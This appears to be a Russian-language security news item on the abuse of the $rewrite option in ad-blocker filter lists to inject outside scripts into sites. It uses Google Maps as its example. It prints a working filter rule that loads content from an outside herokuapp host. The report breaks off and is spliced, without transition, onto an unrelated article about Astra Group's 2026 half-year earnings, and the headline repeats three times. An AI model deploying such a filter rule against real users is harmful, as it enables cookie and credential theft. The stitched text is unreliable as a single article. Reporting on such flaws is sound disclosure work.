Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Фильтры AdBlock можно использовать для инъекции вредоносных скриптов

Новый эксплойт, недавно обнаруженный экспертом в области кибербезопасности, способен использовать фильтры популярных блокировщиков рекламы Adblock Plus, AdBlock и uBlocker для инъекции сторонних скриптов в код страниц веб-сайтов.

Adblock Plus, AdBlock и uBlocker представляют собой специальные расширения для браузеров, помогающие пользователям скрывать надоедливую и агрессивную рекламу со страниц ресурсов.

База пользователей этих блокировщиков насчитывает более 10 миллионов человек. Таким образом, если злоумышленнику удастся внедрить вредоносные скрипты, он получит возможность красть файлы cookie, учетные данные, а также осуществлять нужные ему редиректы.

Работа блокировщиков рекламы завязана на использовании списка URL, на которых был отмечен рекламный контент или даже вредоносное поведение. Тот же Adblock Plus, например, запрещает браузеру подключаться к этим ссылкам, следовательно, рекламные скрипты не в состоянии загрузиться.

Вся проблема кроется в опции списка фильтров под названием $rewrite, которая была представлена в 2018 году (в Adblocker Plus 3.2). Эта функция позволяет разработчику подменить запрос, совпадающий с определенным регулярным выражением, другим URL.

Единственное условие — заменяемая строка должна быть относительным URL-адресом. Таким образом, если запрос для example.com/ad.gif заменить на example.com/puppies.gif, пользователь вместо рекламы увидит картинку с милыми щенками.

При этом разработчики предусмотрели защиту, запретив запросы вида SCRIPT, SUBDOCUMENT, OBJECT и OBJECT_SUBREQUEST — с ними эта функция не будет работать.

Однако исследователь Армин Себастьян нашел способ, позволяющий создать правило, благодаря которому сторонний скрипт можно встроить в контент конкретного сайта.

Для этого потребуется найти ресурс, который допускает загрузку скриптов со сторонних доменов, а также использует XMLHttpRequest или Fetch для загрузки скриптов. Сам Себастьян довольно быстро нашел такой ресурс — он использовал Google Maps для демонстрации уязвимости.

Google Maps использует XMLHttpRequest для загрузки скриптов, что позволило эксперту воспользоваться функцией фильтров $rewrite для задействования скрипта со стороннего домена. Пример:

/^https://www.google.com/maps/_/js/k=.*/m=pw/.*/rs=.*/$rewrite=/search?hl=en-US&source=hp&biw=&bih=&q=majestic-ramsons.herokuapp.com&btnI=I%27m+Feeling+Lucky&gbv=1

Если пользователь в этом случае посетит google[.]com/maps/, фильтр использует редиректы Google для считывания контента с majestic-ramsons.herokuapp[.]com/.

Чистая прибыль Группы Астра выросла на 67% и достигла 1,1 млрд руб.

«Группа Астра» отчиталась по МСФО за первое полугодие 2026 года. Скорректированная чистая прибыль компании выросла на 96% год к году и достигла 1,2 млрд рублей. Обычная чистая прибыль прибавила 67% — до 1,1 млрд рублей. Выручка увеличилась на 17%, до 7,8 млрд рублей, а отгрузки — на 27%, до 7,3 млрд.

Главным двигателем стал II квартал: выручка подскочила на 47%, до 5,1 млрд рублей, отгрузки — на 42%, до 5,4 млрд.

Одновременно компания прикрутила кран с расходами. Если в I квартале операционные затраты выросли на 22%, то во втором — лишь на 10%. В итоге скорректированная EBITDA за полугодие увеличилась на 40%, до 1,8 млрд рублей. Долговая нагрузка осталась умеренной: отношение чистого долга к LTM скорректированной EBITDA составило 0,38.

Больше всего выручки принесла Astra Linux — 3,4 млрд рублей, на 13% больше прошлогоднего результата. Доходы от сопровождения продуктов выросли на 25%, до 2,5 млрд, а от остальных решений экосистемы — на 20%, до 1,7 млрд рублей.

Почивать на импортозамещённых лаврах компания не собирается. За полугодие она вложила в продуктовую разработку 1,7 млрд рублей и выпустила 28 крупных и небольших обновлений.

Среди новинок — агент «Астра ИИ Код» для анализа кода в закрытом контуре и платформа запуска ИИ-моделей «Боцман AI». Полноценную ИИ-стратегию компания обещает представить в сентябре.

В августе принадлежащая группе «Тантор Лабс» получила права на российскую СУБД «Персей» и забрала вместе с ней около 50 разработчиков. Параллельно «Группа Астра» осваивает Юго-Восточную Азию, выкупает собственные акции и сохраняет цель увеличить чистую прибыль по итогам 2026 года на 40%.

Правда, главный экзамен ещё впереди: около 70% годовых отгрузок компании традиционно приходится на второе полугодие. Красивые цифры есть, но финальный зачёт будет зимой.

RSS: Новости на портале Anti-Malware.ru